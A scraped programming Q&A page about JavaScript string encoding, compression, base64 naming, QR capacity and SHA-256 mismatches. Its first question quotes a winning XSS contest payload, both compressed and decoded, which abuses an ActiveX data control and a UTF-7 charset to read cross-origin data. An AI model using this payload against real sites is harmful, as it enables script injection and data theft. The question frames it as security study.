How does this javascript compression technique works?

How does this javascript compression technique works? - javascript

I was checking the results of a security contest involving XSS (link) and found some wonderful and scary JS XSS payloas. The winner (#kinugawamasato) used a javascript compression technique that seems completely other worldly to me:
Compressed payload:
https://cure53.de/xmas2013/?xss=<scriPt>document.write(unescape(escape(location)
.replace(/u(..)/g,'$1%')))<\/scriPt>㱯扪散琠楤㵥⁣污獳楤㵣汳楤㨳㌳䌷䉃㐭㐶うⴱㅄ〭
䉃〴ⴰ〸ぃ㜰㔵䄸㌠潮牯睥湴敲㵡汥牴⠯繷⸪ℱ⼮數散⡲散潲摳整⠰⤩⤾㱳癧⁯湬潡搽攮摡瑡畲氽慬汛攮
牯睤敬業㴳㍝⬧㽳慮瑡㵀Ⅱ汬潷彤潭慩湳㴧⭤潭慩渻攮捨慲獥琽❵瑦ⴷ✾
What really happened:
<object id=e classid=clsid:333C7BC4-460F-11D0-BC04-0080C7055A83 onrowenter=alert(/~w.*!1/.exec(recordset(0)))><svg onload=e.dataurl=all[e.rowdelim=33]+'?santa=#!allow_domains='+domain;e.charset='utf-7'>
Is this technique already documented somewhere so I can study it? How exacly this thing works? Is there already some javascript compressor that does that in an automated way? How would a WAF react to such a payload like that?
You can see more examples here.

I am using lz-string library for JS compression whenever placing any data into localStorage. I am just a user of this library - not the compression expert. But this is information which could be found around that tool...
The lz-string Goal:
lz-string was designed to fulfill the need of storing large amounts of data in localStorage, specifically on mobile devices. localStorage being usually limited to 5MB, all you can compress is that much more data you can store.
...
I (note: "I" means, Pieroxy, author of the lz-string) started out from an LZW implementation (no more patents on that), which is very simple...
So, the fundament, the base of this implemntation is LZW, which is mentioned here Javascript client-data compression by Andy E. Let me point out
the link to Wikipedia article on LZW
the LZW compression example.
An extract from Wikipedia - Algorithm:
The scenario described by Welch's 1984 encodes sequences of 8-bit data as fixed-length 12-bit codes. The codes from 0 to 255 represent 1-character sequences consisting of the corresponding 8-bit character, and the codes 256 through 4095 are created in a dictionary for sequences encountered in the data as it is encoded. At each stage in compression, input bytes are gathered into a sequence until the next character would make a sequence for which there is no code yet in the dictionary. The code for the sequence (without that character) is added to the output, and a new code (for the sequence with that character) is added to the dictionary.
Wikipedia - Encoding:
A high level view of the encoding algorithm is shown here:
Initialize the dictionary to contain all strings of length one.
Find the longest string W in the dictionary that matches the current input.
Emit the dictionary index for W to output and remove W from the input.
Add W followed by the next symbol in the input to the dictionary.
Go to Step 2.
How it works in case of the lz-string we can observer here:
The source code: lz-string-1.3.3.js
Let me cite few steps from the already mentioned lz-string source:
What I did was:
localStorage can only contain JavaScript strings. Strings in JavaScript are stored internally in UTF-16, meaning every character weight 16 bits. I modified the implementation to work with a 16bit-wide token space.
I had to remove the default dictionary initialization, totally useless on a 16bit-wide token space.
I initialize the dictionary with three tokens:
An entry that produces a 16-bit token.
An entry that produces an 8-bit token, because most of what I will store is in the iso-latin-1 space, meaning tokens below 256.
An entry that mark the end of the stream.
The output is processed by a bit stream that stores effectively 16 bits per character in the output string.
Each token is stored with just as many bits that are needed according to the size of the dictionary. Hence, the first token takes 2 bits, the second to 7th three bits, etc....
Well, now we know, that by these compression techniques we get 16 bits information. We can test it in this demo: http://pieroxy.net/blog/pages/lz-string/demo.html (or/and another here)
Which converts the: Hello, world. into
85 04 36 30 f6 60 40 03 0e 04 01 e9 80 39 03 26
00 a2
So we need the final step, let me cite again:
Well, this lib produces stuff that isn't really a string. By using all 16 bits of the UTF-16 bitspace, those strings aren't exactly valid UTF-16. By version 1.3.0, I added two helper encoders to produce stuff that we can do something with:
compress produces invalid UTF-16 strings. Those can be stored in localStorage only on webkit browsers (Tested on Android, Chrome, Safari). Can be decompressed with decompress
to continue our example, the Hello, world. would be converted into
҅〶惶̀Ў㦀☃ꈀ
And that's finally it. We can see, that the set of all the ...other then latin characters... comes from the final conversion into UTF-16. Hope, this will give some hints...

Related

I need to convert a binary string to ascii array using javascript. (UTF-16 to ascii conversion) [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 1 year ago.
Improve this question
I want to read "binary" data from a text file in to a javascript string(which i did) and convert the bytes to an array of ascii values. I have been trying to accomplish this for a few days and could not find a solution as i have not enough experience with utf-16 or js.
The data i am trying to convert is not text. Most of the examples on the site deals with strings like "Hello" or so which i could not get to work. The binary data consists of some (220032 to be precise) bytes which are values between 0 and 255.
I would be grateful if someone could point me to the right direction.
example :
the original file consists of (the byte array i want to get):
hex: 80 00 F5 03 7E 36 41 01 (decimal : 128 0 245 3 126 54 65 1)
for these bytes i get (using charCodeAt):
decimal : 65533 0 65533 3 121 94 20 1
Some more information about the question as stackoverflow stated that it is not clear enough.
I have a thermal camera that has a resolution of 382x288 which means 110016 pixels. Every pixel is represented with an unsigned short which is 2 bytes long per pixel. makingone frame of thermal data 220032 bytes. I have limited space so i am not considering json, xml etc. So i got the data from the camera using a c++ program that i wrote and wrote it to a text file as ascii characters.
The customer wanted to see the image on a local server all through his company (TV's Computers Tablets etc). So i decided to take the asp/javascript way for this project. I am not very good with javascript so did not know until much later that javascript used UTF-16 for strings which i did not want as i needed the ascii codes of each character in the file.
Thanks to 'Joachim Sauer' as he pointed me to the right direction i was able to solve the issue without much hassle using fetch and Uint8Array.
async load_Frame(p_filename){
await fetch("./frames/"+p_filename+".txt")
.then(response=>{
if (!response.ok) throw new Error("problem");
return response.arrayBuffer();
}).then(data=>{
//Here i have the frame as i wanted.
let frame = new Uint8Array(data);
}
}).catch(function(e){
console.log(e);
})
}
and the final product. :)
I did not include the thermal conversion routines as they were out of the scope of the question.

You can't interpret arbitrary binary data as UTF-8 and expect it to work (i.e. be able to round-trip).
UTF-8 has a certain amount of error-detection built in, which means there's plenty of byte sequences that are not valid UTF-8.
Those will reports in errors.
Usually those errors will be silently signaled by producing a Unicode Replacement Character U+FFFD, but they could also be reported via an exception or error code of some kind.
U+FFFD also happens to be the Unicode codepoint 65533, so that's exactly what's happening here.
One or more bytes that are not a valid UTF-8 sequence are "decoded" into this replacement character. Note that the erroneous bytes are no longer visible in the resulting string: all erroneous sequences are collapsed to that one character. There are specific rules how multiple subsequent errors are to be handled, but fundamentally you just lose that information.
I can't really tell you how to "fix" this, because fundamentally trying to interpret non-text binary data as UTF-8 will just not work.
If you explained why you want to do this, we could maybe suggest alternative solutions. This is probably an XY Problem.

Why were Javascript `atob()` and `btoa()` named like that?

In Javascript, window.atob() method decodes a base64 string and window.btoa() method encodes a string into base64.
Then why weren't they named like base64Decode() and base64Encode()?
atob() and btoa() don't make sense because they're not semantic at all.
I want to know the reason.

The atob() and btoa() methods allow authors to transform content to and from the base64 encoding.
In these APIs, for mnemonic purposes, the "b" can be considered to
stand for "binary", and the "a" for "ASCII". In practice, though, for
primarily historical reasons, both the input and output of these
functions are Unicode strings.
From : http://www.w3.org/TR/html/webappapis.html#atob

I know this is old, but it recently came up on Twitter, and I thought I'd share it as it is authoritative.
Me:
#BrendanEich did you pick those names?
Him:
Old Unix names, hard to find man pages rn but see
https://www.unix.com/man-page/minix/1/btoa/ …. The names carried over
from Unix into the Netscape codebase. I reflected them into JS in a
big hurry in 1995 (after the ten days in May but soon).
In case the Minix link breaks, here's the man page content:
BTOA(1) BTOA(1)
NAME
btoa - binary to ascii conversion
SYNOPSIS
btoa [-adhor] [infile] [outfile]
OPTIONS
-a Decode, rather than encode, the file
-d Extracts repair file from diagnosis file
-h Help menu is displayed giving the options
-o The obsolete algorithm is used for backward compatibility
-r Repair a damaged file
EXAMPLES
btoa <a.out >a.btoa # Convert a.out to ASCII
btoa -a <a.btoa >a.out
# Reverse the above
DESCRIPTION
Btoa is a filter that converts a binary file to ascii for transmission over a telephone
line. If two file names are provided, the first in used for input and the second for out-
put. If only one is provided, it is used as the input file. The program is a function-
ally similar alternative to uue/uud, but the encoding is completely different. Since both
of these are widely used, both have been provided with MINIX. The file is expanded about
25 percent in the process.
SEE ALSO
uue(1), uud(1).
Source: Brendan Eich, the creator of JavaScript. https://twitter.com/BrendanEich/status/998618208725684224

To sum up the already given answers:
atob stands for ASCII to binary
e.g.: atob("ZXhhbXBsZSELCg==") == "example!^K"
btoa stands for binary to ASCII
e.g.: btoa("\x01\x02\xfe\xff") == "AQL+/w=="
Why ASCII and binary:
ASCII (the a) is the result of base64 encoding. A safe text composed only of a subset of ascii characters(*) that can be correctly represented and transported (e.g. email's body),
binary (the b) is any stream of 0s and 1s (in javascript it must be represented with a string type).
(*) in base64 these are limited to: A-Z, a-z, 0-9, +, / and = (padding, only at the end) https://en.wikipedia.org/wiki/Base64
P.S. I must admit I myself was initially confused by the naming and thought the names were swapped. I thought that b stand for "base64 encoded string" and a for "any string" :D.

The names come from a unix function with similar functionality, but you can already read that in other answers here.
Here is my mnemonic to remember which one to use. This doesn't really answer the question itself, but might help people figure which one of the functions to use without keeping a tab open on this question on stack overflow all day long.
Beautiful to Awful btoa
Take something Beautiful (aka, beautiful content that would make sense to your application: json, xml, text, binary data) and transform it to something Awful, that cannot be understood as is (aka: encoded).
Awful to Beautiful atob
The exact opposite of btoa
Note
Some may say that binary is not beautiful, but hey, this is only a trick to help you.

I can't locate a source at the moment, but it is common knowledge that in this case, the b stands for 'binary', and the a for 'ASCII'.
Therefore, the functions are actually named:
ASCII to Binary for atob(), and
Binary to ASCII for btoa().
Note this is browser implementation, and was left for legacy / backwards-compatibility purposes. In Node.js for example, these don't exist.

Storing more info in QR Code

I am trying to develop a hybrid mobile app with QR code functionality. QR Code contains a limited number of character can be stored with it. So, I am thinking is it possible to compress the string to make it shorter so that I can store more info into the QR code?

At lengths that short, most compression algorithms will actually make data longer, not shorter. There are some algorithms which may work well, though… smaz comes to mind. However, it is going to depend heavily on what you are trying to compress, and you haven't really provided any information about that.
Instead of thinking about compression, your best bet may be to find an encoding scheme which makes more sense for your data. For example, if you're encoding a date and time, store it as a single number instead of text. Think about whether you really need seconds. If you are storing numbers, consider using variable-length quantities. If your data is JSON, consider using protobuf instead.
If what you have really is text, it may be worth considering coming up with your own character set. Instead of ASCII where each character 8 bits, can you limit yourself to 64 characters? a-z, A-Z, 0-9, and two punctuation characters is only 64 possible symbols… if that is all you need, you could use a 6-bit encoding. If the strings aren't case-sensitive you have tons of room for punctuation.

SHA-256 hashes different between C# and Javascript

I am currently working on a project that will involve credit card swipes for admissions based on database rows. Like a will call system, the SHA-256 hash of the CC number must match the hash in the DB row in order to be considered the "proper pickup".
However, because the box office system is based in the browser, the CC number on pickup must be hashed client-side, using Javascript, and then compared to the previously downloaded will call data.
However when trying to hash the numbers, the hash always ends up different than what was hashed when the DB row was created (using VB.NET and SQL Server 2008 R2). For example, if a CC number in the database happened to be 4444333322221111, then the resulting hash from .NET would become xU6sVelMEme0N8aEcCKlNl5cG25kl8Mo5pzTowExenM=.
However, when using any SHA-256 hash library for Javascript I could find, the resulting hash would always be NbjuSagE7lHVQzKSZG096bHtQoMLscYAXyuCXX0Wtw0=.
I'm assuming this is some kind of Unicode/UTF-8 issue, but no matter what I try I cannot get the hashes to come out the same and it's starting to drive me crazy. Can anyone offer any advice?
Here's something that may provide some insight. Please go to http://www.insidepro.com/hashes.php?lang=eng and insert "4444333322221111" without quotes into the Password box. Afterwards, scroll down to the SHA-256 section.
You can see that there are four results, two of them are the hash codes I posted (the second from the top being the Javascript hash and the bottom one being the SQL hash). According to that page, the bottom hash result is generated using a base 64 string, as well as making the password into unicode format.
I've investigated this and tried many different functions to encode the password into unicode format, but no matter what little tweaks I try or other functions I make, I could never get it to match the hash code I need.
I am currently investigating the parameters used when calling the SHA-256 function on the server side.
UPDATE:
So just to make sure I wasn't crazy, I ran the Hash method I'm using for the CC numbers in the immediate window while debugging. Again, the result remains the same as before. You can see a screenshot here: http://i.imgur.com/raEyX.png

According to online SHA-256 hash calculator and a base-64 to hex decoder, it is the .NET implementation that has not calculated the hash correctly. You may want to double check the parameters you pass to the hashing functions.
When you are dealing with two untrusted implementations, it is always a good idea to find another independent implementation, and choose the one that matches the third one as correct. Either that, or find some test vectors, and validate the implementations individually.
EDIT:
A quick experiment shows that the SHA-256 hash you get from .NET matches the hext string 3400340034003400330033003300330032003200320032003100310031003100 - little endian 16-bit characters. Make sure you pass in ASCII.

Adam Liss had it right when he mentioned the byte arrays between strings in .NET/SQL Server are different than strings in Javascript. The array in .NET for the string 4444333322221111 would look like [52 0 52 0 52 0 52 0 51 0 51 0... etc.] and the same thing in Javascript would just look like [52 52 52 52 51 51 51 51...]. Thus, with different byte arrays, different hashes were generated.
I was able to remedy this for my application by modifying the base 64 SHA-256 hashing algorithm from here, where each character is pulled from the string one at a time in order to generate the hash.
Rather than having it do it this way, I first converted the string into a unicode-like byte array (like the .NET example above, 52 0 52 0 etc), fed that array to the hashing algorithm instead of the string, and did some very minor tweaks in order for it to grab each array member to generate the hash. Low and behold, it worked and now I have a very convenient method of hashing CC numbers in the same fashion as the .NET framework for quick and easy order lookup.

Are you sure about your JavaScript SHA256 function ?
And your firstly generated hash ?
SHA-256("4444333322221111"); // 35b8ee49a804ee51d5433292646d3de9b1ed42830bb1c6005f2b825d7d16b70d
hex: 35b8ee49a804ee51d5433292646d3de9b1ed42830bb1c6005f2b825d7d16b70d
HEX: 35B8EE49A804EE51D5433292646D3DE9B1ED42830BB1C6005F2B825D7D16B70D
h:e:x: 35:b8:ee:49:a8:04:ee:51:d5:43:32:92:64:6d:3d:e9:b1:ed:42:83:0b:b1:c6:00:5f:2b:82:5d:7d:16:b7:0d
base64: NbjuSagE7lHVQzKSZG096bHtQoMLscYAXyuCXX0Wtw0=

How to store large sequences of doubles as literal string in javascript file

What is the best way to store ca. 100 sequences of doubles directly in the js file? Each sequence will have length of ca. 10 000 doubles or more.
Requirements
the javascript file must be executed as fast as possible
it is enough for me to iterate through the sequence on demand (I do not need to decode all the numbers at js execution. They will be decoded on event.)
it shouldn't take to much space
The simplest option is probably to use string of CSV format but then the doubles are not stored in the most efficient manner, right?
Another option might be to store the numbers in Base64 byte array, but then I have no idea how to read the base64 string into double.
EDIT:
I would like to use the doubles to transform Matrix4x4 of 3d nodes in Adobe 3D annotations. Adobe allows to import external files but it is so complicated that it might be simpler to include all the data in the js file directly.

As I mentioned in my comment, it is probably not worth it to try and encode the values. Here are some values from my head on the required amount of data to store doubles (updated from comment).
Assuming 1,000,000 values:
Using direct encoding (won't work well in a JS file): 8 B = 8 MB
Using base64: 10.7 B = 10.7 MB
Literals (best case): 1 B + delimiter = 2 MB
Literals (worst case): 21 B + delimiter = 22 MB
Literals (average case assuming evenly distributed values): 19 B + delimiter = 20MB
Note: A double can take 21 bytes (assuming 15 digits of precision) in the worst case like this: 1.23456789101112e-131
As you can see, you still won't be able to cut it below 1/2 of using plain literal values with encoding, and if you plan on doing random-access decoding it will get complicated fast. It may be best to stick to literals. You might get some benefit from using the external file that you mentioned, but that depends on how much effort is needed to do so.
Some ideas on how to optimize using literals:
Depending on the precision required, you could approximate the values and limit a value to, say, 5 digits of precision. This would incredibly shorten the file.
You could compress the file. I think you can specify any number of doubles using 14 characters, (0123456789.e-,) so theoretically, you could compress such a string to half its size. I don't know how good practical modern compression routines are though.

We Keep Coding

JavaScript is the programming language of the Web.